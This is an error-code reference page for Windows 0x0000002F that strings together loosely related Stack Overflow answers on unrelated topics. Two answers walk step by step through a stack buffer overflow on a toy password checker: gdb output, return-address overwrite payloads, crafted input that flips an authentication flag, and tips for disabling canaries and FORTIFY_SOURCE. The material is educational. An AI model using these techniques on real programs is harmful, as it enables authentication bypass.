Windows error 0x0000002F, 47

Detailed Error Information

INSTRUCTION_BUS_ERROR[1]

This is a Blue Screen of Death stop code. More information is available in the Knowledge Base article Bug Check 0x2F: INSTRUCTION_BUS_ERROR.

HRESULT analysis[2]

This is probably not the correct interpretation of this error. The Win32 error above is more likely to indicate the actual problem.
FlagsSeveritySuccess

This code indicates success, rather than an error. This may not be the correct interpretation of this code, or possibly the program is handling errors incorrectly.

Reserved (R)false
OriginMicrosoft
NTSTATUSfalse
Reserved (X)false
FacilityCode0 (0x000)
NameFACILITY_NULL[2][3]
DescriptionThe default facility code.[2][3]
Error Code47 (0x002f)

Possible solutions

11

Is gcc reordering local variables at compilation time?

c
gcc
gdb
reverse-engineering
buffer-overflow

The compiler authors are completely free to implement any allocation scheme for local variables with automatic storage. auth_flag could be set before or after password_buffer on the stack, it could be in a register, it could be elided completely if proper analysis of the code allows it. There might not even be a stack... The only guarantee the Standard gives you is this:

strcpy(password_buffer, password); invokes undefined behavior if the source string including its null terminator is longer than the destination array password_buffer. Whether this undefined behavior fits your needs is completely outside of the language specification.

As a matter of fact, some implementors purposely complicate the task of would be hackers by randomizing the behavior in cases such as the posted code.

answered on Stack Overflow Aug 11, 2016 by chqrlie • edited Oct 17, 2016 by chqrlie
3

Attempting a buffer overflow

c
buffer-overflow

This is quite easy to exploit, here is the way to walk through.

First compile it with -g, it makes it easier to understand what you are doing. Then, our goal will be to rewrite the saved eip of check_auth1() and move it to the else-part of the test in the main() function.

$> gcc -m32 -g -o vuln vuln.c
$> gdb ./vuln
...
(gdb) break check_auth1
Breakpoint 1 at 0x80484c3: file vulne.c, line 9.
(gdb) run `python -c 'print("A"*28)'`
Starting program: ./vulne `python -c 'print("A"*28)'`
Breakpoint 1,check_auth1 (password=0xffffd55d 'A' <repeats 28 times>) at vuln.c:9
9       int auth_flag = 0;
(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
 eip = 0x80484c3 in check_auth1 (vuln.c:9); saved eip 0x804853f
 called by frame at 0xffffd320
 source language c.
 Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
 Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
 Saved registers:
   ebp at 0xffffd2e8, eip at 0xffffd2ec

We stopped at check_auth1() and displayed the stack frame. We saw that the saved eip is stored in the stack at 0xffffd2ec and contains 0x804853f.

Let see to what it does lead:

(gdb) disassemble main
Dump of assembler code for function main:
   0x080484ff <+0>:     push   %ebp
   0x08048500 <+1>:     mov    %esp,%ebp
   0x08048502 <+3>:     and    $0xfffffff0,%esp
   0x08048505 <+6>:     sub    $0x20,%esp
   0x08048508 <+9>:     cmpl   $0x1,0x8(%ebp)
   0x0804850c <+13>:    jg     0x804852f <main+48>
   0x0804850e <+15>:    mov    0xc(%ebp),%eax
   0x08048511 <+18>:    mov    (%eax),%eax
   0x08048513 <+20>:    mov    %eax,0x4(%esp)
   0x08048517 <+24>:    movl   $0x8048604,(%esp)
   0x0804851e <+31>:    call   0x8048360 <printf@plt>
   0x08048523 <+36>:    movl   $0x0,(%esp)
   0x0804852a <+43>:    call   0x80483a0 <exit@plt>
   0x0804852f <+48>:    mov    0xc(%ebp),%eax
   0x08048532 <+51>:    add    $0x4,%eax
   0x08048535 <+54>:    mov    (%eax),%eax
   0x08048537 <+56>:    mov    %eax,(%esp)
   0x0804853a <+59>:    call   0x80484bd <check_auth1>
   0x0804853f <+64>:    mov    %eax,0x1c(%esp)   <-- We jump here when returning
   0x08048543 <+68>:    cmpl   $0x1,0x1c(%esp)
   0x08048548 <+73>:    je     0x8048558 <main+89>
   0x0804854a <+75>:    movl   $0x804861a,(%esp)
   0x08048551 <+82>:    call   0x8048380 <puts@plt>
   0x08048556 <+87>:    jmp    0x8048564 <main+101>
   0x08048558 <+89>:    movl   $0x8048627,(%esp) <-- We want to jump here
   0x0804855f <+96>:    call   0x8048380 <puts@plt>
   0x08048564 <+101>:   mov    $0x0,%eax
   0x08048569 <+106>:   leave  
   0x0804856a <+107>:   ret    
End of assembler dump.

But the truth is that we want to avoid to go through the cmpl $0x1,0x1c(%esp) and go directly to the else-part of the test. Meaning that we want to jump to 0x08048558.

Anyway, lets first try to see if our 28 'A' are enough to rewrite the saved eip.

(gdb) next
10      strcpy(password_buffer, password);
(gdb) next
11      if (strcmp(password_buffer, "cup") == 0) {

Here, the strcpy did the overflow, so lets look at the stack-frame:

(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
 eip = 0x80484dc in check_auth1 (vulnerable.c:11); saved eip 0x41414141
 called by frame at 0xffffd2f4
 source language c.
 Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
 Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
 Saved registers:
  ebp at 0xffffd2e8, eip at 0xffffd2ec

Indeed, we rewrote the saved eip with 'A' (0x41 is the hexadecimal code for A). And, in fact, 28 is exactly what we need, not more. If we replace the four last bytes by the target address it will be okay.

One thing is that you need to reorder the bytes to take the little-endianess into account. So, 0x08048558 will become \x58\x85\x04\x08.

Finally, you will also need to write some meaningful address for the saved ebp value (not AAAA), so my trick is just to double the last address like this:

$> ./vuln `python -c 'print("A"*20 + "\x58\x85\x04\x08\x58\x85\x04\x08")'`

Note that there is no need to disable the ASLR, because you are jumping in the .text section (and this section do no move under the ASLR). But, you definitely need to disable canaries.

EDIT: I was wrong about replacing the saved ebp by our saved eip. In fact, if you do not give the right ebp you will hit a segfault when attempting to exit from main. This is because, we did set the saved ebp to somewhere in the .text section and, even if there is no problem when returning from check_auth1, the stack frame will be restored improperly when returning in the main function (the system will believe that the stack is located in the code). The result will be that the 4 bytes above the address pointed by the saved ebp we wrote (and pointing to the instructions) will be mistaken with the saved eip of main. So, either you disable the ASLR and write the correct address of the saved ebp (0xffffd330) which will lead to

 $> ./vuln `python -c 'print("A"*20 + "\xff\xff\xd3\x30\x58\x85\x04\x08")'`

Or, you need to perform a ROP that will perform a clean exit(0) (which is usually quite easy to achieve).

answered on Stack Overflow Nov 21, 2013 by perror • edited Nov 22, 2013 by perror
3

How to stop GNU GCC from mangling dll import function names

c++
gcc
codeblocks

DirectSoundCreate is declared as WINAPI, a macro for __stdcall:

 extern HRESULT WINAPI DirectSoundCreate(...);

Which gives it the @12 decoration. You are probably getting the linker error because you are not linking dsound.lib. Or whatever version of you have is missing the export, not uncommon in the mingw version of the SDK files.

You are getting the __imp prefix because you declared the functions __declspec(dllimport). Just remove that.

answered on Stack Overflow Jan 24, 2012 by Hans Passant • edited Jan 24, 2012 by Hans Passant
3

Attempting a buffer overflow

c
buffer-overflow

you're checking against 1 exactly; change it to (the much more normal style for c programming)

if (! authenticated) {

and you'll see that it is working (or run it in gdb, or print out the flag value, and you'll see that the flag is being overwritten nicely, it's just not 1).

remember that an int is made of multiple chars. so setting a value of exactly 1 is hard, because many of those chars need to be zero (which is the string terminator). instead you are getting a value like 13363 (for the password 12345678901234).

[huh; valgrind doesn't complain even with the overflow.]

UPDATE

ok, here's how to do it with the code you have. we need a string with 13 characters, where the final character is ASCII 1. in bash:

> echo -n "123456789012" > foo
> echo $'\001' >> foo
> ./a.out `cat foo`
Allowed.

where i am using

  if (authenticated != 1) {
    printf("NOT Allowed.\n");
  } else {
    printf("Allowed.\n");
  }

also, i am relying on the compiler setting some unused bytes to zero (little endian; 13th byte is 1 14-16th are 0). it works with gcc bo.c but not with gcc -O3 bo.c.

the other answer here gets around this by walking on to the next place that can be overwritten usefully (i assumed you were targeting the auth_flag variable since you placed it directly after the password).

answered on Stack Overflow Nov 21, 2013 by andrew cooke • edited Nov 22, 2013 by andrew cooke
2

Attempting a buffer overflow

c
buffer-overflow
strcpy(password_buffer, password);

One of the things you will need to address during testing is this function call. If the program seg faults, then it could be because of FORTIFY_SOURCE. I'd like to say "crashes unexpectedly", but I don't think that applies here ;)

FORTIFY_SOURCE uses "safer" variants of high risk functions like memcpy and strcpy. The compiler uses the safer variants when it can deduce the destination buffer size. If the copy would exceed the destination buffer size, then the program calls abort().

To disable FORTIFY_SOURCE for your testing, you should compile the program with -U_FORTIFY_SOURCE or -D_FORTIFY_SOURCE=0.

answered on Stack Overflow Sep 12, 2014 by jww
2

Windows Phone App crashes after Launcher.LaunchFileAsync when downloaded from store

windows-phone
windows-phone-8.1
windows-phone-store

Looks like you failed to use LaunchFileAsync/FileOpenPicker correctly. Follow this guide carefully.

Unless debugging, OS terminates your process just after you've called the picker (especially on low-memory devices with 512MB RAM). It's up to your application to save its state, and when reactivated restore the state and take user to the exact place in your app where she was.

Also, here’s how you can debug the problem.

answered on Stack Overflow May 29, 2015 by Soonts • edited May 23, 2017 by Community
2

Change display format of DirectX "Object Table"

visual-studio-2012
hlsl
directx-11

You need to change the format through the Graphics Object Table (menu Debug > Graphics > Object Table).

Select your index buffer in the table and then change its format using the Buffer Format combo box at the top of the Graphics Object Table.

answered on Stack Overflow Jul 27, 2013 by AkisK
0

CorePlot silent crash (possibly from scaleToFitPlots:)

iphone
ios
core-plot

Upgrade to Core Plot 0.4.

I no longer get this crash after I upgraded to 0.4. http://code.google.com/p/core-plot/downloads/list?can=2&q=&sort=-uploaded&colspec=Filename%20Summary%20Uploaded%20ReleaseDate%20Size%20DownloadCount

answered on Stack Overflow Jul 21, 2011 by cduck
0

Simple y86 do-nothing program halt

assembly
y86

You're overwriting parts of the code with stack contents.

You initialize esp to Stack, which is 0x37. By the time you reach Sum you'll have 5 DWORDs on the stack (3 * pushl, and 2 * call). Five DWORDs is 20 bytes (0x14), and 0x37 - 0x14 is 0x23 (remember, the stack grows backwards in memory). You can see this is the "Changes to registers" list: %esp: 0x00000000 0x00000023.

As you can see in the "Changes to memory" list, the DWORD at 0x2C (which is where Sum starts) has changed from 0x45205fa0 to 0x37000000. Assuming little-endian, that means the byte at address 0x2C is 0x00, which equals HALT.

answered on Stack Overflow Oct 14, 2013 by Michael
0

Restcomm SMSC keeps raising ActivityAlreadyExistsException when submit_sm request is sent

java
jboss
smpp
restcomm
mobicents

I believe this was answered here right?

answered on Stack Overflow Jan 24, 2018 by gsaslis
0

App Crashes with EXC_BAD_INSTRUCTION (SIGILL)?

ios
debugging
crash

There's not much information here, as others pointed out, but this appears to be a problem when upgrading. You didn't mention how you tested this, but you should test it basically like this:

  • Use two projects, one with the previously released version, and one with the new one.
  • Run the previously released version of the app. Do some typical stuff, then close.
  • Now run the new verion of the app.

If there is an upgrade problem, you should be able to trigger it this way.

answered on Stack Overflow Jul 18, 2013 by ecotax
0

Projection matrix causing inaccuracy in clip-space depth calculation?

c#
directx
direct3d
hlsl
slimdx

Your depth buffer always has the same value written into it because you have your projection matrix wrong. The value that actually gets written is the w-value so you need to juggle your matrix around a bit.

The DirectX documentation gives a good explanation of the perspective transform.

Basically your matrix should be as follows

W, 0, 0, 0
0, H, 0, 0
0, 0, Q, 1
0, 0, P, 0

Where

W = 1.0f / tanf( fovHoriz / 2 );
H = 1.0f / tanf( fovVert  / 2 );
Q = zFar / (zFar - zNear);
P = -Q * zNear;
answered on Stack Overflow May 20, 2013 by Goz • edited May 23, 2017 by Community

Comments

Leave a comment

(plain text only)

Sources

  1. https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/bug-check-code-reference2
  2. https://msdn.microsoft.com/en-us/library/cc231198.aspx
  3. winerror.h from Windows SDK 10.0.14393.0

User contributions licensed under CC BY-SA 3.0